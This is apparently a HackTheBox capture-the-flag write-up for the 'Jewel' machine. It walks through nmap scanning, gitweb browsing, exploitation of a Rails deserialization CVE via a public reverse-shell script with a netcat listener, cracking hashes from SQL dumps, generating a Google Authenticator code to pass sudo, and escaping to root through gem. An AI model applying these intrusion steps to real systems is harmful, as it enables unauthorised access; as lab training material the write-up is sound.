Jewel Walkthrough
Last updated
Last updated
Hey Everyone! Today we have one of HackTheBox machines, âJewelâ. Itâs a medium machine and depends on CVE for the exploitation process, before we get started letâs see its info
At The first step, we will try to enumerate the box to collect information like:
Open ports
Hidden directories, parameter discovery, leaked secrets, etc. âIf we have websiteâ
Security modes for all servers and ports
So, we will start with Nmap
nmap -A -T4 10.10.10.211
We have 3 open ports 22/8000/8080
It seems that we have 2 websites working on these 2 ports 8000/8080 so letâs check them
http://10.10.10.211:8080
We have a webpage with http-title Bl0G . Letâs check the second one
http://10.10.10.211:8000
It redirects us to http://10.10.10.211:8000/gitweb and after searching about whatâs gitweb Iâve found this result
I know that Iâve access to read or write to the Bl0G repos, so letâs check the files, to try to find any secrets or any other information.
After spending a little time searching for any juicy file name database/login/users or any other keyword, Iâve found these results
And for filesâŚ
I know that the Bl0G the website works on the rails framework, and also I've sql file, after checking it...
Iâve 2 usernames and 2 hashes, Iâve tried to crack them using hashcat but it fails, so I think itâs a rabbit hole :(
But all, letâs save them into any file and continue our enumeration.
After searching for a rails version, Iâve found that it works on rails 5.2.2.1
After searching for RCE CVEâs for this version, Iâve found CVE 2020â8165
Okay, letâs try to exploit itâŚ
After searching for any public exploit
Deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.
Generate a payload from this repo
Use this payload to change your username
Refresh the /articles page to show your payload name
For the first one, Iâve problems with ruby the version which requires a specific version to run the exploit, to save my time Iâve used the second one which is written in python for this machine, and will exploit it also
After checking the exploit code to know how it works, here are the exploit arguments
python3 rev.py 10.10.xx.xx port
After trying to execute it, I faced a problem with a hex character, so I added a line to encode it
Letâs run it and listen on our port using netcat
It works and we get the user flag.
For now, I need to enumerate this box to find any important info which led me the root account so instead of searching and enumerating the box manually cmd by cmd, I used LinPEAS automation tool which helps you find sensitive info and enumerate the server
After using it Iâve found these hashes
And after enumerating the backup file in /var/backups/dump_2020_08_27.sql Iâve found also another hash. For now, Iâve 3 hashed and 2 from the enumeration step at the first
Letâs try to break them all using hashcat or john
As you can see john cracked one of them, and we have a password spongebob
Iâve tried to use this password for the root account, but it fails.
Letâs check our home directory
We have a google_authenticator code seems interesting
Iâve tried to check my privileges by typing sudo -l but it requires a password which is spongebob and the Google authenticator verification code
So, Iâve used Google authenticator online service to generate the verification code as you can see
And type sudo -l and inserting the password and the code
Note: Your machine timezone MUST be the same with the server timezone âThis is the mechanism which google authenticator worksâ
If the timezones isnât the same, the code will expire for the server but it still active for your machine, hereâs the point !!
After trying to know our privileges by sudo -l
Iâve permission to execute /usr/bin/gem as a root without requiring a password
After searching for how to escape from gem Iâve found this resource
You have 3 ways to open a shell from gem, you can use anyone of them.
Iâve used the first one and opens a root shell
